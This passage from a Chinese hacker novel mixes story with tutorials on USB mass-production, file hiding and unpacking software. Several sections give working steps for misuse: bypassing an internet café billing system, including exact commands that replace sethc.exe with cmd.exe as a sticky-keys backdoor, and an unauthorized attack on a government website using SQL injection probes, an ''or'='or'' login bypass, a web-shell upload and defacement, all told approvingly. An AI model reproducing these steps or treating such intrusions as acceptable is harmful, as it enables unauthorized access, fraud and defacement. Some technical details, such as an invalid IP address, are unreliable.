自行量产主要有两个目的,一是U盘恢复,比如U盘无法正常使用(硬件损坏除外),或者是U盘容量经过误操作变小了,比如原先16G的U盘莫名其妙的变成了8G,这些问题都可以使用相应的量产工具来尝试修复。量产的另一个目的就是增强功能,比如可以模拟出USB-HDD,USB-ZIP,USB-CDROM,分别加载不同的启动镜像,相当于多张不同的启动光盘,这样以后装机维护系统都方便多了,也可以实现加密分区等功能。要对U盘实现量产,首先需要知道U盘主控芯片厂商,这和U盘品牌没关系,同一型号品牌的U盘,由于时间批次等的不同,厂家往往会采用不同的主控芯片,要查看主控芯片就要用到工具。

危险漫步推荐使用chipgeninus,插入U盘执行即可。他的U盘是威宝的32GU盘,芯片制造商是alcor安国,芯片型号是AU6983,设备ID是VID=OED1,PID=6981,在百度直接搜索AU6983量产工具就行了。如果U盘不是这个型号,那么按照上面的方法直接搜索相应的量产工具名称。为了保证量产顺利,量产过程中不要断电,有的机箱前置USB接口供电不足可能会不稳定,建议使用机箱后面的USB接口,推荐使用笔记本对U盘进行量产。

量产工具下载好后,拔掉U盘,打开AlcorMP.ini文件,找到“[Vendorlnfo]”字段,把VID和PID改成刚才在Chipgeninus中查看到的内容。改好后保存关闭,运行主程序AlcorMP.exe,然后再插入U盘,成功的话就会发现量产工具已经识别出U盘。为了提高成功率,建议先单击开始按钮,这时会对U盘进行一次低格操作。当然,备份必不可少。

格式完以后准备工作就算是完成了,这时点击“设定”按钮,弹出了一个窗口。输入密码,这里主要是厂商为了防止用户误操作,设置了一个密码作为保护措施,如果遇到没有密码的情况就直接点确定进入。如果有密码,则看软件介绍,一般都能在那里发现密码。

进入“设定”后,这里建议使用默认的设置。这里有一个“优化方式”选项,选择“U盘容量优先”,这样量化好的容量最大:选择“U盘速度优先”,这样量化好的U盘最快,“原低格设定”就是厂商的设定了,是比较稳定的设置。切换到“U盘信息设定”界面,VID、PID依然修改成在chipgeninus中查看到的,这里默认已经是改好了,“客户信息”和“产品信息”大家可以随意更改,建议改的个性些,这些信息在删除硬件,停用硬件时可以看到,注意“客户信息”最多8个字节(8个字母,4个汉字),“产品信息”最多16个字节(16个字母,8个汉字)。如果要制作同批更多U盘,可以点击“导出配置”按钮来导出配置。

打开“装置方式设定”,模式设定共有六种,“普通盘”就是最常见的可移动磁盘;“本地盘”就是量产为和硬盘盘符一样的U盘:“只读盘”可以将一部分空间量产为只读的分区,这样就不怕病毒感染了;“加密盘”就是将U盘量产为加密盘:“AutoRun”就是将U盘量产为光盘格式,右下方的“LED设定”,可以对U盘的灯进行设置,默认为读写U盘时才亮,如果这里的“空闲状态”设置为ON,意思就是只要插上U盘灯就一直亮,建议设置为OFF。

再举几个量产的例子。大家都有些隐私不希望被别人看见,这里就需要加密功能了,有的U盘提供了相应的加密工具,有的却没有,这种里,就需要量产工具来实现,点击“加密盘”,在“分区设定,”处拖动滑块,左边为普通U盘,右边为加密U盘,卷标可以随意设置,在“加密盘设定”里输入一个密码,然后点击“坏磁区设定”,关闭MP时卸载驱动,设置好后点击确定。返回到窗口,点开始按钮后便开始对U盘进行量产了。

量产成功后,关闭工具,拔掉U盘再重新插上,这时可以看到有两个U盘盘符,点击第二个盘符,进入后发现有个iStar.exe文件,执行后,“计算机锁”功能就是把U盘设置成一把钥匙,激活此功能后,拔出U盘电脑即被锁定,插入U盘后,电脑自动解锁;如果对先前设置的普通区和加密区大小不满意,可以使用格式化功能重新划定大小:选择加密的盘符,密码登入国标才是可点状态,点击后输入你设置的密码,只有密码正确该分区文件才会显现出来,才可以进行读写操作,另外这里也提供了更改密码的功能。

接着,模拟USB-CDROM,来模拟出一个光盘,危险漫步习惯用Windows原始光盘,对于新硬盘尽管有各种各样的分区格式化工具,但他始终认为使用原始盘的格式化工具比较可靠,因为现在硬盘发展到上T了,如果用老的分区格式化工具可能日后会出现各种不必要的麻烦,有的人喜欢玩BT3破解无线密码,也可以模拟成USB-CDROM。

危险漫步使用的深度是精简XP系统,点击“AutoRun”,就就会弹出一个ISO SET窗口,这里选择ISO MODE,在下面的路径处选择ISO镜像,下面的CD-ROM卷标,可以设置一个卷标名,如果不选择就是ISO的默认卷标。同样打开“坏磁区设定”界面,文件系统选择FAT32,勾选上关闭MP时卸载驱动。点击“确定”返回到窗口,点“开始”按钮后便会进行量产,量产完成后,关闭量产工具,重新拔插U盘,就会看到一个光盘标志,这就是他选择的ISO镜像,还有一个U盘标志。

如果要使用这个镜像来启动系统,在BIOS里选择USB-CDROM就可以启动此镜像文件了。

汪青蓝听得一头雾水,危险漫步嘿嘿得笑,还是觉得先从简单说起。这是某天他在公寓里无聊时候偶然见发现的,该方法利用了Windows系统自带的功能,不需要使用其他的软件就可以隐藏文件夹,方法简单。

那日,危险漫步在修改文件查看器时,无意间按了左shift键,发现查看方式为缩略图时文件和文件夹的名字都不见了。剐开始还以为是系统出了问题,他反复试验了几次,又到百度上搜索了一下,才知道这原来是Windows自带的隐藏文件名字的功能。具体的方法很简单,在“我的电脑”或“资源管理器”窗口中按下左Shift键,然后在空白处单击鼠标右键,在弹出的菜单中选择“查看”一“缩略图”项,这时缩略图模式下的文件、文件夹和盘符图标都不显示名字和盘符了。

更进一步,危险漫步把文件夹的图标换位空白图标,这样就达可以到隐藏的目的。不过,这样只能在略所图的格式下查看。通过重命名文件夹时可以输入Windows无法显示的ASCII字符,这样就能把文件夹命名为空或者直接隐藏。

具体操作方法如下:重命名时,按下“Alt键”和小键盘上的“1、6、0”三个数字键(注意,一定要是小键盘上的三个键),松开键盘,文件夹名字就消失了。然后按照方法把文件夹图标换为空白,就大功告成了。显示出左上角的文件夹被完全隐藏了。

“Alt+160”的隐藏方法,操作非常简单,也非常的实用。如果把重要的文件用这种方法隐藏,因为没有名字,当然是搜不到的。

听完危险漫步讲的“第二节课”,汪青蓝更加无语,“这有什么用呢?难道以后为了建筑图不被盗,画完就要隐藏么?”

危险漫步笑着说,“不是,我的意思是,以后你把毛片藏起来,就不会被发现了。

……

一周后,东洲日报的头条正式报道了吴仕凯一案,建筑图自然完璧归赵。危险漫步放下报纸,把汪青蓝电脑里放上自己准备的工具,只要日志检测到异常,警报系统就被触动。一切布置妥当以后,危险漫步就与汪青蓝道别了。他见汪青蓝对建筑的热爱程度那么深,心理深为这个朋友感到高兴。

临行前,危险漫步又教给汪青蓝一个安全措施,即双重加密。对于加密文件来说,最担心的事情就是密码泄露,这会导致加密文件毫无秘密可言。但是有一种方法,即使别人知道了密码,也不必为文件的安全顾虑,这不是天方夜谭,如果使用Axantum AxCrypt这款独特的加密软件,就可以将上述想法变成现实。Axantum AxCrypt使用独特的钥匙文件配合密码的方式,可以让加密文件坚不可摧,没有精心保存的钥匙文件,就是知道了密码也无法打开加密文件。

首先需要安装Axantum AxCrypt,安装过程非常简单,安装完成后就可以使用了。在“开始”——“程序”——“附件”——“资源管理器”中选择目标文件或者文件夹,点击右键选择“axCrypt”→“Make Key-File”,在弹出的窗口中选择密钥文件的名称和存储路径,然后就可以得到密钥文件了(该文件实际上是个文本文件,其中包含了随机数,不同的密钥文件其内容完全不同)。接下来在目标文件上点击右键,选择“axCrypt”→“Encrypt”,在弹出的加密窗口中输入密码,并点击“Key-File”栏后面的浏览按钮,选择刚才生成的密钥文件,最后点击“OK”按钮,Axantum AxCrypt就可以使用密码和密钥文件同时加密目标文件了,加密后的文件其后缀名为“axx”,而名称和原始文件相同,同时也会保存在同一路径下。如果在刚才的右键菜单中选择“axCrypt”→“Encrypt a copy”,就表示创建加密文件的同时还保留原始文件,选择“axCrypt”→“Encrypt copy to .EXE”,就表示创建可执行的加密文件,并且保留原始文件。现在只需要保存好密钥文件,密码即使被别人知道了,对方也无法打开加密的文件。

如何执行解密操作呢?还是以第一种加密方式为例来进行说明,双击目标加密文件,在弹出的解密窗口中的“Enter passphrase”栏中输入密码,在“Key-File”栏中选择对应的密钥文件(两者缺一不可),然后点击”OK“按钮,就可以执行解密操作,得到原始的文件了。 


第二十二章  大森林(二)


回到古店,危险漫步原计划是直接去大森林网吧找楚虹,一星期未见怪想她的。打了大森林,楚虹不在,电话里楚虹告诉危险漫步她去上课了,危险漫步郁闷无比。走出网吧门,忽然心生一个很邪恶的年头,又折回网吧里。

过去家里没有计算机的时候,危险漫步觉得网吧计算机速度很快,等公寓里有了电脑,他又觉得网吧计算机的速度非常缓慢了,而且流氓软件横行。

流氓软件的具体定义是什么呢?从技术上讲,恶意广告软件(adware)、间谍软件(spyware)、恶意共享软件(malicious shareware)等等都处在合法商业软件和电脑病毒之间的灰色地带,它们既不属于正规商业软件,也不属于真正的病毒,既有一定的实用价值,也会给用户带来种种干扰,人们就把这种软件称为流氓软件。

流氓软件的流氓行为主要有以下几个方面的体现:

1、强行侵入用户电脑,无法卸载;

2、强行弹出广告,借以获取商业利益;

3、有侵害用户的虚拟财产安全潜在因素;

4、偷偷收集用户在网上消费时的行为习惯、帐号密码。

家里网络或者网吧网络,第二点出现的概率相对较多。去除它并非难事,只要去除软件强行弹出的广告和修改用户的注册表。

危险漫步运行了一款辅助小软件,结果退出的时候浏览器自动打开并显示了软件指令的一个具体网页,这也是流氓软件流氓行为的一种。危险漫步心情有些插,这个流氓行为无疑是撞到了枪口上。

去除广告要要调用IE一般都会用到SheIIExecute这个API函数,在OD中对这个API下断来找到关键点,然后去除广告。当然也可以利用弹出广告的网址来进行关键点的查找,比如在OD中进行字符串的搜索,在搜索结果中查找广告网页的网址进行关键点的定位,然后去除广告,以上就是两种常用的思路。危险漫步思考了一下,决定利用查找字符串的方法来寻找关键点,先使用PEID检测一下,看程序有没有加壳,因为对加壳的程序是查找不到字符串的。这个程序被加壳了,好在脱壳很简单,利用单步法就可以轻松脱壳。

解释脱壳,自然要从加壳说起。

在一些计算机软件里有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序和自然界的壳在功能上有很多相同的地方,基于命名的规则,大家就把这样的程序称为“壳”。

加壳,其实是利用特殊的算法,对可执行文件里的资源进行压缩,只不过这个压缩之后的文件,可以独立运行,解压过程完全隐蔽,都在内存中完成。它们附加在原程序上通过加载器载入内存后,先于原始程序执行,得到控制权,执行过程中对原始程序进行解密、还原,还原完成后再把控制权交还给原始程序,执行原来的代码部分。加上外壳后,原始程序代码在磁盘文件中一般是以加密后的形式存在的,只在执行时在内存中还原,这样就可以比较有效地防止破解者对程序文件的非法修改,同时也可以防止程序被静态反编译。

加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。

加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。

加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。

这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。

从技术的角度出发,壳是一段执行于原始程序前的代码。原始程序的代码在加壳的过程中可能被压缩、加密……。当加壳后的文件执行时,壳-这段代码先于原始程序运行,他把压缩、加密后的代码还原成原始程序代码,然后再把执行权交还给原始代码。 软件的壳分为加密壳、压缩壳、伪装壳、多层壳等类,目的都是为了隐藏程序真正的OEP(入口点,防止被破解)。

作者编好软件后,编译成exe可执行文件。 1.有一些版权信息需要保护起来,不想让别人随便改动,如作者的姓名,即为了保护软件不被破解,通常都是采用加壳来进行保护。 2.需要把程序搞的小一点,从而方便使用。于是,需要用到一些软件,它们能将exe可执行文件压缩, 3.在黑客界给木马等软件加壳脱壳以躲避杀毒软件。实现上述功能,这些软件称为加壳软件。

加壳工具在文件头里加了一段指令,告诉CPU,怎么才能解压自己。现在的CPU都很快,所以这个解压过程你看不出什么东西。软件一下子就打开了,只有你机器配置非常差,才会感觉到不加壳和加壳后的软件运行速度的差别。当你加壳时,其实就是给可执行的文件加上个外衣。用户执行的只是这个外壳程序。当你执行这个程序的时候这个壳就会把原来的程序在内存中解开,解开后,以后的就交给真正的程序。所以,这些的工作只是在内存中运行的。通常说的对外壳加密,都是指很多网上免费或者非免费的软件,被一些专门的加壳程序加壳,基本上是对程序的压缩或者不压缩。因为有的时候程序会过大,需要压缩。但是大部分的程序是因为防止反跟踪,防止程序被人跟踪调试,防止算法程序不想被别人静态分析。加密代码和数据,保护你的程序数据的完整性。不被修改或者窥视你程序的内幕。

加“壳”虽然增加了CPU负担,但是减少了硬盘读写时间,实际应用时加“壳”以后程序运行速度更快(当然有的加“壳”以后会变慢,那是选择的加“壳”工具问题)。

一般软件都加“壳”这样不但可以保护自己的软件不被破解、修改还可以增加运行时启动速度。

加“壳”不等于木马,平时的绝大多数软件都加了自己的专用“壳”。

RAR和ZIP都是压缩软件,不是加“壳”工具,他们解压时是需要进行磁盘读写,“壳”的解压缩是直接在内存中进行的。用RAR或者ZIP压缩一个病毒你试试,解压缩时杀毒软件肯定会发现。而用加“壳”手段封装木马,能发现的杀毒软件就少得多。

木马加壳的原理很简单,在黑客营中提供的多数木马中,很多都是经过处理的,而这些处理就是所谓的加壳。当一个程序生成好后,很轻松的就可以利用诸如资源工具和反汇编工具对它进行修改,但如果程序员给程序加一个壳的话,那么至少这个加了壳的程序就不是那么好修改了,如果想修改就必须先脱壳。

软件加壳是作者写完软件后,为了保护自己的代码或维护软件产权等利益所常用到的手段。目前有很多加壳工具,既然有矛,自然就有盾,脱壳即去掉软件所加的壳,软件脱壳 有手动脱和自动脱壳之分。

脱克成功后,危险漫步使用PEID检测,发现程序是使用Visual Basic编写的。

之所以要确定是什么语言编写的,是因为在字符串查找中有两种方法:UNICODE和ASCII。对VB编写的程序来说,要使用UNICODE方式来分析字符串,因为VB程序处理字符串是使用UNICODE方式的,而使用其它语言编写的程序则选择ASCII方式。

利用OD的字符串搜索插件来搜索字符串,会发现有很多结果。原因很简单,因为软件在多处调用了该字符串。那到底哪一个才是真正被需要的呢?方法是在所有的结果上下好断点,软件退出时OD中断在哪儿,那这个地方就是需要的地址。

危险漫步长出一口气,任务已经走完一大半了,接下来的任务相对轻松,把00568ECA处的CALL给NOP掉(在OD的反汇编窗口00568ECA那行的代码上点击右键,选择“Binary”——“Fill with NOPs”),然后鼠标选中修改的代码,点击右键,在弹出的菜单中选择“Copy to executable”——“selection”,保存即可。运行保存后的文件,在退出时就不会弹出烦人的IE了。

下一步,禁止流氓软件肆意修改IE主页。思路其实和去广告相差无几,一个是利用API断点,因为软件要修改IE主页,而IE主页的

网址是保存在注册表中的,具体位置是在“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”,这样就可以利用相关的注册表操作函数(比如RegOpenKey)来进行关键代码的定位了。另一种方法就是搜索字符串,和上面方法一样。

一种解决的办法就是寻找该段的段首,让其直接返回,在OD的反汇编窗口向上滚动,找到段首位置“0058C080 55 PUSH EBP”,在该行代码上按键盘上的空格键进入代码编辑,将该行代码改为ret,然后按照上面的方法保存程序即可。另外,通过动态调试也可以发现0058C21F处的call是修改IE主页的元凶,也可以按照上面去广告的方法将其NOP掉,然后保存程序即可。

正巧,桌面右边时间提示不足一小时,危险漫步想要做的就是破解网吧的收费系统。

这是一个很无聊的过程,如果无聊的人做无聊的事,这个晌午危险漫步被无聊泡得发涨。

因为每个网吧的实际情况并不一样,所以实际破解中总会遇到这样那样的问题。

首先要明确目的——为了实现对电脑的破解,做到不用卡,也能够上网,要做的主要有以下三点:

1.在电脑中接收到相关的收费程序。

2.将自启动中的启动项和相关的注册表项删除。

3.解决远程监控而重启系统的问题。

可以说,做到了以上这三点,对于网吧过大部分收费系统,都能够实现破解了。

从理论上讲,任何的网吧管理程序都是能够破解成功的,只要够坚持并且坚持到底,就一定能够成功。

要用到的软件是万象幽灵,先利用万象密码读取功能查出登录密码,然后登陆进入万象的后台,取消掉第几分钟检测与服务端的连接。这样就可以避免远程服务端控制本地电脑重启了,只需要使用一些能查看服务的工具,找到这个服务后关闭就行了(因为大多数网吧中都有许多限制,所以进行的操作最好都选用专门的工具)。接下来要用到的工具就是克星之王了,运行后选择网吧破解,然后直接选择第三式,取消掉注册表项,然后选择注销。

接着再次打开克星之王,选择网吧破解,选择第二式,结束掉选中的程序,然后选择超强功能,找到自启动检查项,再检查一下启动项,结束并删除就可以了,最后就是注销系统(在网吧试验的时候,有时会无法进行注销,甚至是不能重启,有可能是结束了一些别的程序而造成的)。为什么要进行注销呢?这是因为前面结束了程序并不一定都是需要结束的,这样就会使电脑上一些正常的程序无法运行,进行注销后就能解决这个问题了。比如,在本地网吧试验的时候,进行破解后,发现了一些游戏无法正常运行了,而注销之后,可以说本地的电脑就被成功的破解了。最后要做的就是找另一台电脑,下掉自己的卡就行了。

由于每个网吧的实际情况并不相同,也就导致了很多人进行破解的时候,并不是百分百都能成功。能够实现这个目的,使用什么软件和方法那都不是重点,至于操作过程中出现的各种问题,还需要自己进行研究解决。

大森林的安全做的很好:控制面板禁用了,计算机管理也加了密码,至于其他出现的问题,比如说不能注销、程序无法关闭、没有反应等等。

如果粘滞键后门,也就是把cmd换成sethc。将在登录系统的时候按五下shift键就会调出cmd程序,这个时候是系统权限,然后利用这个系统权限对本地电脑进行破解,从而达到破解收费系统的目的。

具体操作如下:使用自己的卡登录电脑,调出cmd,然后输入以下命令:ren c:\windows\system32\dllcache\sethc.exesethc1.exe,copy/y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe,意思就是先修改系统备份文件夹中sethc.exe的名字,然后将system32目录下的cmd替换成sethc,这样系统就没有办法自动恢复了,在另一台电脑上登录自己的卡,这个时候本地的电脑就会弹出登录框,这个时候连续按五下shift,就会调出cmd,这个时候拥有最高权限,自然也就可以结束万象系统来实现免费上网了。

方法还有很多。首先还是用自己的卡登录,然后运行超级防锁专家,这个时候就会多出一个桌面。暂且称为桌面b,原来的桌面就成为桌面a。切换回桌面a,然后到另外一台电脑上输入自己的卡号和密码,在点登陆的一瞬间(由于卡已经在另外一台电脑上登陆,所以会出现登录界面),按下win+2键,切换回桌面b,也就是使用软件打开的桌面,这个时候就可以正常上网了。

事实上破解网吧收费系统是没有多少技术含量的,这种做法也不是很安全,因为无论如何都要在另外一台电脑上下掉自己的卡,服务端上就会显示电脑闲置,但事实上却在使用着,所以还是容易被发现。


 第二十三章  意外之旅


公寓里空荡荡的,林雨生和萧让都不在。拨通林雨生的电话,林雨生听说危险漫步已经回来了,就让他到三蓝,语气非常焦急。

危险漫步吃了点东西,匆匆赶了过去。三蓝是田依工作的单位,电话里匆匆忙忙危险漫步也没问是什么事。到了才知道,原来是有客户,但是三蓝安全的技术骨干都去黄山旅游了,现在留在公司的,除了菜鸟,就是其余部门的人。

危险漫步看见田依,打趣道:“田依,升官了?转技术型了?”

田依柳眉一挑,“你们这群人啊,雨生没追到我之前,叫我依姐,等他追到了,就改叫全名了。”

危险漫步笑,“好好好,嫂子说的对,我给你赔个不是。”

萧让不知从哪儿晃了过来,把事情经过告诉了危险漫步。一家企业刚刚完成厂房的改造和企业网络升级,今天本来是迁厂的喜庆日子,谁知道公司的网络却瘫痪了,于是找到了三蓝安全,没想到三蓝的骨干都旅游去了,一群人大眼瞪小眼,正不知该怎么办,危险漫步的电话就进来了。

该企业的网完全瘫痪,网络部的人检查完说已经链接上了,但是却上不了网。企业停止一天半天倒没有大碍,关键是厂房,该企业对厂房改用全自动生产,一切都是由电脑来操作流水作业,网络一旦不通,生产线就得罢工。

危险漫步听了,感觉是ARP攻击,能造成这种效果的,多半是ARP攻击造成的。计算机间的通讯,道理很简单,计算机A要发信息给计算机B,他首先要知道B的IP地址,然后在自己的记录列表中查找这个IP地址对应的MAC地址,然后消息就可以传出去了。当找不到B的MAC地址时候,他就会发整个网络发出广播,询问电脑B的具体地址,这样不法分子会有机可乘。

要解决ARP攻击也很简单,企业只有几百台计算机而已,只要把每台计算机里的IP地址固定,然后和他的MAC地址绑定,接着建立一个映射表,将这些对应关系保存起来,就可以了。只要消息不会传送错误,日后就算再添新计算机,只要给新机子射新的IP地址,然后和它的MAC地址对应起来添加到这个映射表中就可以了。再有,就是找到ARP攻击的源头,把它清除掉。

危险漫步招呼林雨生和萧让,跟着企业的人一起去他们那里,末了,还回过头问田依去不去,田依头一仰,说不了。危险漫步也不在意,径自往前走。林雨生走回来,轻轻吻了吻田依的额头,柔声说:“走啦。”他牵着田依的手,漫步在队伍的尾端。

结果到了那家企业的时候,三蓝安全派来的只有财务、财务的男朋友(当然是编制外)、还有更编制外的,财务男朋友的朋友。

这个穷酸的阵容无疑让企业的人非常不满,网络部的人当即发飙,“三蓝就这么瞧不起人么?如果不想接我们这活,可以拒绝,我们没有意见,但也不帮派这——这么几个人来羞辱我们。”

把危险漫步一行人带过来的非常尴尬,危险漫步他们更尴尬,这指桑骂槐也太明显了。边上的经理一边拉网络部的同事,一边安抚危险漫步一行人,不过他的表情并非像真的安慰,他虽然嘴上不说,但是不满的情绪已经写在了脸上。

危险漫步:“现在三蓝安全大多数人都因为一项重大任务出差在外,我是受三蓝安全暂时负责人田依的邀请,才来你们公司帮忙,如果你们公司觉得我技不如人,或者不能修好你们的网络,那么我们就此告辞,另外,我们没有羞辱你们的意思,三蓝和贵公司在业务上只有合作,没有冲突的地方,何来羞辱的说法?”

经理的面子有些挂不住,忙领着危险漫步往里走,“哪里的话,小李性格就那样,各位别往心里去。”

没走两步,危险漫步又停了下来,指着墙上的海报说,“这上面有×国×保密局的网站,你们公司网络部的人,可以拿下它么?”

众人面面相觑,危险漫步也不等他们的回答,拿过萧让手里的笔记本,操作起来。其实很多保密局的站点并不安全,只是因为地位特殊,所以哪怕是千疮百孔,相对其他网站也是比较安全的。

具体的网址就不公开了,危险漫步在网址后面分别添加“and 1=1”和“and 1=2”进行判断,确定存在注入漏洞,直接把该地址扔进啊D中进行检测,管理员帐号和密码顺利的猜解出来了。

密码是经过MD5 32位加密的,把这个MD5加密的密码拿到CMD5等在线查询网站去破解,如果破解出来的话,再找到网站后台的管理登录界面登录。

危险漫步并不想走这些弯路,管理员的帐号存在“&”就表示可以使用字符来作为帐号,那么,就可以使用"'or'='or'”这个经典的方式来进行登录。

登录用户名可以利用字符,登录帐号使用"'or'='or'",登录密码任意输入,居然成功的登录进去了。

成功的进入了管理后台,接下来的任务就是拿webshell,后台中有一个"下载专区”,可以利用它来上传asp或aspx木马,一般支持aspx程序的站点都是支持ASP的。

在“文件说明”中任意填写,比如dfg,通过“文件地址”右边的“浏览”选择一个要上传的asp木马,然后点“添加”,没有任何提示,无法获取木马的地址该怎么办呢?打开网站首页,找到下载专区,找到刚才上传的文件。直接点击它,webshell就成功的打开了。

上传一个黑页上去,就这样简单的拿下了网站。

网络部的人目瞪口呆,经理的脸上已经笑出了花,“哎呀呀,我们真的没有那方面的意思,您贵姓——哦,陆先生这边请……”

经理一边走,一边介绍详细的情况,“公司是前几天开始搬迁的,整个企业的网络是由我们公司的网络部门根据自动化生产线的需要,自行设计和划分的,这个是有统一规划的,但是我们并没有统一的安全和病毒防护。几天以前,我们公司的网络开始时断时续,当时我们并没有当回事,以为是运营商那边的问题。为了以防万一,我们让员工安装了杀毒软件,但是一点效果也没有,到了今天就——”

危险漫步:“路由器,交换机之类的设备检查了没有。”

经理:“检查过了,我们也请过设备商检测,都没有问题。”

危险漫步点头,既然不是物理设备的问题,那么基本上就是ARP病毒造成的。危险漫步问:“公司的IP划分有统一安排的没?”

先前发飙的人说:“没有,我们搬一台机子就设一个IP,我们是想等全部都搬好之后,再做一次性的安排。”

危险漫步怫然道:“公司的IP如此混乱,找感染ARP病毒的计算机有多麻烦?为什么这点基本常识都没有?就算我们排查出了发动攻击的IP,那也没法弄清楚具体是哪台计算机!”

那人默不作声,一个劲的点头。

危险漫步看着网络部拿过来的全公司的网络结构图,“这样,你们关闭企业全网,让各部门的子网各自运行,看哪些部门存在问题,这样我们寻找的范围会小很多。”

几人全部上阵,捣鼓了三个多小时,萧让突然在电脑前抬头,“现在各自IP已经发过去了,谁的IP是31.458.6.665?”

一个很秀气的女生向他挥手,兴奋地说:“这边这边,是我是我。”

危险漫步语塞,计算机中个毒,有必要和中彩票一样兴奋么。他走过去,拔掉女孩的网线,又问萧让还有没有其他源头。

萧让摇了摇头,,危险漫步转身对女孩说:“你的电脑中毒了,暂时要征用一下。”

女孩看起来更加兴奋:“真的么!我就说我电脑怎么这么慢!快用吧,不要客气。”

女孩的电脑极慢,任务管理器按半天没反应。危险漫步索性重启,重启半天又没反应,问女孩:“你电脑平时开机要多久?”

女孩答十分钟。

危险漫步快要崩溃了,他冲萧让招手:“老萧,我无能为力了,你来吧。”

萧让过来打听怎么回事之后,连往外跑:“我也无能为力。”

重启成功后,电脑里五花八门的木马肉眼都能看出来,危险漫步除了感叹彪悍,不知道再说什么。

他先将木马逐个清理掉,犹豫运行速度实在太慢,又耽误了不少的时间,接着,危险漫步找到了ARP攻击病毒,清理之后好人做到底,把女孩电脑里的一系列病毒全都清理掉。

危险漫步回到门厅,经理连忙走了过来,寒暄几句,危险漫步说:“ARP攻击的源头都被清除掉了,如果没有什么意外的话,公司的网络已经恢复了。只是,全公司安装杀毒软件,这得是强制性的,我们在攻击源头的电脑上发现了大量的木马,这些木马可能感染了其他人的电脑,而且,ARP病毒也可能是有人通过木马给你们扔进来的。再者,你们公司的IP必须有个统一的规定,然后做好VLAN的划分,这样就算一个子网爆发了ARP攻击,也不至于让一个攻击源头就把整个公司的全网瘫痪了。”

经理点头称是。

VLAN(Virtual Local Area Network)的中文名为"虚拟局域网"。

虚拟局域网(VLAN)是一组逻辑上的设备和用户,这些设备和用户并不受物理位置的限制,可以根据功能、部门及应用等因素将它们组织起来,相互之间的通信就好像它们在同一个网段中一样,由此得名虚拟局域网。VLAN是一种比较新的技术,工作在OSI参考模型的第2层和第3层,一个VLAN就是一个广播域,VLAN之间的通信是通过第3层的路由器来完成的。与传统的局域网技术相比较,VLAN技术更加灵活,它具有以下优点: 网络设备的移动、添加和修改的管理开销减少;可以控制广播活动;可提高网络的安全性。

在计算机网络中,一个二层网络可以被划分为多个不同的广播域,一个广播域对应了一个特定的用户组,默认情况下这些不同的广播域是相互隔离的。不同的广播域之间想要通信,需要通过一个或多个路由器。这样的一个广播域就称为VLAN。


第二十三章  病毒


事情完满解决,危险漫步心情不错。

上述的ARP攻击是计算机众多攻击手段的一种。ARP,即Address Resolution Protocol,地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。相关协议有RARP、代理ARP。NDP用于在IPv6中代替地址解析协议。

地址解析协议由互联网工程任务组(IETF)在1982年11月发布的RFC 826中描述制定。地址解析协议是IPv4中必不可少的协议,而IPv4是使用较为广泛的互联网协议版本(IPv6仍处在部署的初期)。

OSI模型把网络工作分为七层,IP地址在OSI模型的第三层,MAC地址在第二层,彼此不直接打交道。在通过以太网发送IP数据包时,需要先封装第三层(32位IP地址)、第二层(48位MAC地址)的报头,但由于发送时只知道目标IP地址,不知道其MAC地址,又不能跨第二、三层,所以需要使用地址解析协议。使用地址解析协议,可根据网络层IP数据包包头中的IP地址信息解析出目标硬件地址(MAC地址)信息,以保证通信的顺利进行。

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。

攻击者向电脑A发送一个伪造的ARP响应,告诉电脑A:电脑B的IP地址192.168.0.2对应的MAC地址是00-aa-00-62-c6-03,电脑A信以为真,将这个对应关系写入自己的ARP缓存表中,以后发送数据时,将本应该发往电脑B的数据发送给了攻击者。同样的,攻击者向电脑B也发送一个伪造的ARP响应,告诉电脑B:电脑A的IP地址192.168.0.1对应的MAC地址是00-aa-00-62-c6-03,电脑B也会将数据发送给攻击者。

至此攻击者就控制了电脑A和电脑B之间的流量,他可以选择被动地监测流量,获取密码和其他涉密信息,也可以伪造数据,改变电脑A和电脑B之间的通信内容。

为了解决ARP攻击问题,可以在网络中的交换机上配置802.1x协议。

IEEE 802.1x是基于端口的访问控制协议,它对连接到交换机的用户进行认证和授权。在交换机上配置802.1x协议后,攻击者在连接交换机时需要进行身份认证(结合MAC、端口、帐户、VLAN和密码等),只有通过认证后才能向网络发送数据。攻击者未通过认证就不能向网络发送伪造的ARP报文。

 那么病毒又是什么呢?

计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。

计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。

